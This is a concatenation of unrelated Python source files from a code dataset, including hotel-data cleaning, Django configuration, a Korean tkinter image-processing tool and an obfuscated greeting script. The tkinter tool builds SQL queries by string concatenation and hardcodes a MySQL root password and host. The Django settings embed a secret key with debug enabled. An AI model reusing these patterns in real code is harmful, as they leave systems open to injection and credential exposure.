hotel['high_price']=hotel['price_range'].apply(lambda x: int(x[2][1:].replace(",","")) if x[0] != "NAN" else np.NaN)
hotel.drop('price_range', axis = 1, inplace = True)
#%%
# Expanding amenities to individual columns
# Will hold all unique amenities
list_of_all_amenities = []
# Loop through each row checking to see if any new amenities can be added
for row in hotel['amenities']:
for ele in row:
if ele not in list_of_all_amenities:
list_of_all_amenities.append(ele)
# Sort to make it easier
list_of_all_amenities = sorted(list_of_all_amenities)
# New df that will contain all new columns for amenities
versus = hotel[['hotel_name','amenities']]
# Sort the existing amenities for each hotel
versus['amenities'] = versus['amenities'].apply(lambda x: sorted(x))
# Creates new columns for all amenities and set it as false
for i in list_of_all_amenities:
versus[i] = False
# iterate over each value for amenities and set the index of the amenities to true
for ind,value in enumerate(versus['amenities']):
for ele in value:
versus.set_value(ind,ele, True)
# Returns columns back to hotel and removes amenities
hotel = hotel.merge(versus.drop('amenities',axis=1), how = 'inner', on ="hotel_name").drop('amenities',axis=1)
hotel.to_pickle('files/hotel_info.pkl')
#%%
reviews['hotel_name'].loc[reviews[reviews['hotel_name'] == "Hotel Indigo Atlanta – Vinings"].index]= "Hotel Indigo Atlanta - Vinings"
reviews['hotel_name'].loc[reviews[reviews['hotel_name'] == 'DoubleTree by Hilton Hotel Atlanta North Druid Hills – Emory Area'].index]= 'DoubleTree by Hilton Hotel Atlanta North Druid Hills - Emory Area'
#%%
final = reviews.merge(hotel, how ='left', on= 'hotel_name')
final.to_pickle('files/read_in.pkl')
#%%
#%%
| [
"paulbkim94@gmail.com"
] | paulbkim94@gmail.com |
e301cf4e8f6f25417f5f8ff02b0debeda97ab9a6 | a137dcee4da101a843d4a5d3b2054472d484f4ec | /eeslides/eeslides/urls.py | 8cb32ae0f32254d164426a8dc4d73f343861cb23 | [] | no_license | hanshanley/EEfaces-1 | 462aa0c38867030dd0c2bd19a2082b87d9d42690 | 9fc590e26ba474295120f486b14703aa95112d49 | refs/heads/master | 2020-12-30T22:35:37.733913 | 2016-11-10T06:02:12 | 2016-11-10T06:02:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 974 | py | """eeslides URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'', include('eeslides_app.urls')),
]
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) | [
"skwang@princeton.edu"
] | skwang@princeton.edu |
408be7c9835520057e0fd69759857a3e3bc02f1d | b0b87924d07101e25fa56754ceaa2f22edc10208 | /workspace/python_study/Woojae_nam/Wu/Day11-05.py | e07fe32103a8b2b11607f10373a2d4d795669ccd | [] | no_license | SoheeKwak/Python | 2295dd03e5f235315d07355cbe72998f8b86c147 | e1a5f0ecf31e926f2320c5df0e3416306b8ce316 | refs/heads/master | 2020-04-02T13:49:58.367361 | 2018-11-23T09:33:23 | 2018-11-23T09:33:23 | 154,499,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,792 | py | ## 영상 처리 및 데이터 분석 툴
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
## 함수 선언부
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = os.path.getsize(fname) # 파일 크기 확인
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'rb') # 파일 열기(바이너리 모드)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
loadImage(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 기존에 캐버스 있으면 뜯어내기.
if canvas != None :
canvas.destroy()
# 화면 준비 (고정됨)
VIEW_X, VIEW_Y = 128, 128
if VIEW_X >= outW or VIEW_Y >= outH : #영상이 128미만이면
VIEW_X = outW
VIEW_Y = outH
step =1 # 건너뛸 숫자
else :
step = int(outW / VIEW_X)
window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
canvas.create_image((VIEW_X/2, VIEW_Y/2), image=paper, state='normal')
# 화면에 출력
def putPixel() :
for i in range(0, outH, step) :
for k in range(0, outW, step) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data), (int(k/step),int(i/step)))
threading.Thread(target=putPixel).start()
canvas.pack(expand=1, anchor=CENTER)
status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH))
def equal() : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
def addImage() : # 밝게하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def a_average() : # 입출력 영상의 평균값
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
rawSum = 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
subWindow = Toplevel(window) # 부모(window)에 종속된 서브윈도
subWindow.geometry('200x100')
label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg) ); label1.pack()
label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg)); label2.pack()
subWindow.mainloop()
def upDown() : # 상하 반전 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[outW-1-i][k] = inImage[i][k]
display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # 축소하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale)
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
for i in range(outW):
for k in range(outH):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
import csv
def saveCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Column', 'Row', 'Value']
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outW):
for col in range(outH):
data = outImage[row][col]
row_list = [row, col, data]
csvWriter.writerow(row_list)
print('OK!')
def saveShuffleCSV() :
pass
def loadCSV(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = -1
fp = open(fname, 'r')
for f in fp :
fsize += 1
fp.close()
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'r') # 파일 열기(바이너리 모드)
csvFP = csv.reader(fp)
next(csvFP)
for row_list in csvFP :
row= int(row_list[0]) ; col = int(row_list[1]) ; value=int(row_list[2])
inImage[row][col] = value
fp.close()
def openCSV() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
loadCSV(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import sqlite3
def saveSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(inW) + \
"," + str(i) + "," + str(k) + "," + str(inImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok!')
def openSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # ['강아지:128', '강아지:512' ....]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openSQLite")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openSQLite")
import pymysql
def saveMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
try:
sql = "DELETE FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + str(outW)
cur.execute(sql)
con.commit()
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) + \
"," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok! saveMySQL')
def openMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # ['강아지:128', '강아지:512' ....]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openMySQL")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openMySQL")
import xlwt
def saveExcel1() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xls", filetypes=(("XLS파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlwt.Workbook()
ws = wb.add_sheet(sheetName)
for rowNum in range(outH):
for colNum in range(outW):
data = outImage[rowNum][colNum]
ws.write(rowNum, colNum, data)
wb.save(output_file)
print('OK! saveExcel1')
import xlsxwriter
def saveExcel2() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xlsx", filetypes=(("XLSX파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlsxwriter.Workbook(output_file)
ws = wb.add_worksheet(sheetName)
ws.set_column(0, outW, 1.0) # 약 0.34 쯤
for r in range(outH):
ws.set_row(r, 9.5) # 약 0.35 쯤
for rowNum in range(outW) :
for colNum in range(outH) :
data = outImage[rowNum][colNum]
# data 값으로 셀의 배경색을 조절 #000000~#FFFFFF
if data > 15 :
hexStr = '#' + (hex(data)[2:])*3
else :
hexStr = '#' + ('0' + hex(data)[2:]) * 3
# 셀의 포맷을 준비
cell_format = wb.add_format()
cell_format.set_bg_color(hexStr)
ws.write(rowNum, colNum, '', cell_format)
wb.close()
print('OK! saveExcel2')
## 전역 변수부
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
VIEW_X, VIEW_Y = 128, 128 # 상수로 씀(대문자)
status = None
## 메인 코드부
window = Tk(); window.geometry('400x400')
window.title('영상 처리&데이터 분석 Ver 0.7')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
status = Label(window, text='이미지 정보', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=a_average)
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='다른 포맷 처리', menu=otherMenu)
otherMenu.add_command(label='CSV로 내보내기', command=saveCSV)
otherMenu.add_command(label='CSV(셔플)로 내보내기', command=saveShuffleCSV)
otherMenu.add_command(label='CSV 불러오기', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='SQLite로 내보내기', command=saveSQLite)
otherMenu.add_command(label='SQLite에서 가져오기', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='MySQL로 내보내기', command=saveMySQL)
otherMenu.add_command(label='MySQL에서 가져오기', command=openMySQL)
otherMenu.add_separator()
otherMenu.add_command(label='Excel로 내보내기(숫자)', command=saveExcel1)
otherMenu.add_command(label='Excel로 내보내기(음영)', command=saveExcel2)
window.mainloop() | [
"soheekwak728@gmail.com"
] | soheekwak728@gmail.com |
099196cd89f175bdc7000e05ef33906e5e9a8486 | d25ca532b31d5c9a8cd9428ed3c03e1ab03c8cad | /spotting/auth_password/forms.py | 09887d7e3c4c136b19f5920fbbec3fa402c74b1a | [] | no_license | rrees/car-spotting | 691c639b2bfaefbe501a7cb5b37e1e0798c74cbb | cd1e631cc66bb722d66fb60e7d958caadd6ca695 | refs/heads/main | 2023-06-10T09:19:43.027613 | 2023-06-03T23:08:46 | 2023-06-03T23:08:46 | 68,435,512 | 0 | 0 | null | 2023-02-28T14:58:54 | 2016-09-17T06:16:29 | Python | UTF-8 | Python | false | false | 234 | py | from wtforms import Form, validators
from wtforms import fields
class Login(Form):
email = fields.StringField('Username', [validators.InputRequired()])
password = fields.PasswordField('Password', [validators.InputRequired()]) | [
"shudderfix@gmail.com"
] | shudderfix@gmail.com |
f86fedfffdcf4b2395c4834a4aa4f57b439f93fa | f57ca2d090539c3d223be4f0dbcfb423c03712f7 | /mysite/settings.py | fe93a82f7b9a519a79b917f4b29d624428d4dbe4 | [] | no_license | saikiran1201/my-portfolio-site-django | 54dc41524f0cbe1a86b054530f2c32c6e62caa7e | 897b9a8d26b8f3393c94eee6c9e9ec377cbed400 | refs/heads/main | 2023-07-27T05:59:13.763150 | 2021-09-14T13:52:45 | 2021-09-14T13:52:45 | 315,571,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,169 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'rvwepwu=de1x_o6c8c1+j9&ve3$x$bq&yes)=o3ny(6jkv@hr4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'base',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/images/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
] | [
"74893035+saikiran1201@users.noreply.github.com"
] | 74893035+saikiran1201@users.noreply.github.com |
83f32c93a09d9517531e3c808330455c03106856 | 6adf4ac34a169fe64933e33f3a70d11bb9d13968 | /FPLPredictions/senior-project/wsgi.py | 9125bbf4cc1f2381740254e2bd1422b81dae9911 | [] | no_license | PrestonMcIllece/portfolio | 6771fdbeb41a40f913c8965bbb83edec7eea21dd | f93f9b85d4fe39f866a3a8a87a3dd1ba5adc170f | refs/heads/master | 2021-06-21T17:07:18.628152 | 2021-06-10T21:48:29 | 2021-06-10T21:48:29 | 227,684,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | """
WSGI config for senior-project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'senior-project.settings')
application = get_wsgi_application()
| [
"mcillece.p@gmail.com"
] | mcillece.p@gmail.com |
19f81da776ea9846783e00f44294459f4042db95 | fea3468b2f6b636949160dbf692f6ce5d72b5c4b | /scripts/load_currencies.py | d05ee2a9f107df9a06d9d0e7b40224f617a6f896 | [
"MIT"
] | permissive | marcelor/xchange | 6031e288f168fcf6f8cb68c35032cebcf6070d1e | 1d1e1f615b088a5dd129a5122540fc0815e20eae | refs/heads/master | 2020-05-17T17:40:26.631115 | 2013-01-20T06:00:45 | 2013-01-20T06:00:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | from main import Currency, db
from money import CURRENCY
for code, obj in CURRENCY.items():
currency = Currency(name=obj.name, iso_code=obj.code)
db.session.add(currency)
db.session.commit()
| [
"marcelor@gmail.com"
] | marcelor@gmail.com |
39abaaebe959475c5de589264f187fbb78f02716 | 6daa4d4bf1235f31e78f34b5478915a58a71ed8e | /Python/hello_world_pt-br.py | bfe3e794162bdee0a01756cb300dfeebc50bddda | [
"MIT"
] | permissive | thivatm/Hello-world | 21b13859593d897668adfe24bee1823ef83d9740 | d03d1e9737d9d2ffdb3e86d6da4b788ebeac3fb0 | refs/heads/master | 2020-04-03T14:52:30.463216 | 2018-10-30T07:24:48 | 2018-10-30T07:24:48 | 155,339,571 | 1 | 1 | MIT | 2018-10-30T08:45:59 | 2018-10-30T07:03:49 | Jupyter Notebook | UTF-8 | Python | false | false | 2,177 | py | #!/usr/bin/env python
"""hello_world_pt-br: overly complicated way of printing "Hello World" in pt-BR!
Based on this blog post:
https://benkurtovic.com/2014/06/01/obfuscating-hello-world.html
This program prints "Ola mundo!" which is the pt-BR equivalent of "Hello World".
Python3 compatibility.
"""
__author__ = "Victor Neves"
__license__ = "MIT"
__maintainer__ = "Victor Neves"
__email__ = "victorneves478@gmail.com"
(lambda _, __, ___, ____, _____, ______, _______, ________:
getattr(
__import__(True.__class__.__name__[_] + [].__class__.__name__[__]),
().__class__.__eq__.__class__.__name__[:__] +
().__iter__().__class__.__name__[_:][_____:________]
)(
_, (lambda _, __, ___: _(_, __, ___))(
lambda _, __, ___:
bytes([___ % __]) + _(_, __, ___ // __) if ___ else
(lambda: _).__code__.co_lnotab,
_ << ________,
(((_____ << ____) + _) << ((_____ << ____) - ___)) + (((___ << ___)
- _) << ((((_ << ____) + _) << __))) - (((_____ << ___) - _) <<
((_______ << ___) + (_ << _))) + (((_______ << ___) - _) << ((___ <<
____) + _)) + (((((_ << ____) - _) << __) - _) << ((_____ << ___) +
_)) - ((((((_ << ___) + _)) << ___) + _) << ((_ << _____) + _)) -
(_______ << ((_______ << __) + _)) + (((___ << ____) + _) << ((_ <<
____) + _)) - ((((((_ << ___) + _)) << __) + _) << ((_____ << _))) +
(_____ << ____) - _
)
)
)(
*(lambda _, __, ___: _(_, __, ___))(
(lambda _, __, ___:
[__(___[(lambda: _).__code__.co_nlocals])] +
_(_, __, ___[(lambda _: _).__code__.co_nlocals:]) if ___ else []
),
lambda _: _.__code__.co_argcount,
(
lambda _: _,
lambda _, __: _,
lambda _, __, ___: _,
lambda _, __, ___, ____: _,
lambda _, __, ___, ____, _____: _,
lambda _, __, ___, ____, _____, ______: _,
lambda _, __, ___, ____, _____, ______, _______: _,
lambda _, __, ___, ____, _____, ______, _______, ________: _
)
)
)
| [
"thivagartm@gmail.com"
] | thivagartm@gmail.com |
2746f2bfab9222260e2d22482a7b2408971cda51 | f7ba8dfe90d5ddf2c2f90950fc36a91cf43f84c6 | /data/create_server.py | 7d3c811bc2a978c4baf1577fab5339a0e7767aaa | [] | no_license | Sazxt/asu-ngentod | 7e9f5c3fd563d9cc52eb886e697f3344b7e19b25 | cc3d4f830efb383bef3c3eda9e30b528ca7ce7f9 | refs/heads/master | 2020-07-27T21:48:52.966235 | 2019-09-18T05:32:13 | 2019-09-18T05:32:13 | 209,225,278 | 1 | 4 | null | null | null | null | UTF-8 | Python | false | false | 33,006 | py |
